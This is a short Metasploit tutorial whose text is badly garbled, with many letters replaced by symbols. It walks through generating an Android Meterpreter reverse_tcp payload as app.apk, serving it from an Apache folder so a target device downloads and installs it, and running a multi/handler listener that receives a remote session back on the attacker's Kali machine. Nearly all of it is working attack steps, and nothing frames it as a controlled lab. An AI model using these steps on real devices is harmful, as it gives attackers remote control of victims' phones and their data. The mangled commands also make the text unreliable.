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In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST= L!O"T=#### " $
replace LHOST with your kali box ip
. tran!"er the app.apk to your android de#ice, $u!t download in the android de#ice !o not in!tall.
%or tran!"erin& the app.apk you can create !hared "older in kali'! location, (#ar(www( , you need to
!tart apache !er#ice, copy the app.apk to thi! "older and brow!e thi! location in androide de#ice.
). In Kali, !tart *eta!ploit "rom the menu or by typin& +m!"con!ole, in a Terminal window.
-. Once *eta!ploit !tart!, type in the "ollowin& to create a li!tener:
u!e exploit(multi(handler
!et payload android(meterpreter(re#er!e.tcp
!et lho!t 1/.101.1.10 2enter your Kali I3 addre!!4
!et lport ----
once the payload handler i! ready, &o to the android de#ice and in!tall the app.apk, a"ter in!tallation
open the application. 5ou can !ee a meterpreter !e!!ion !tarted. 3lea!e re"er the below !creen

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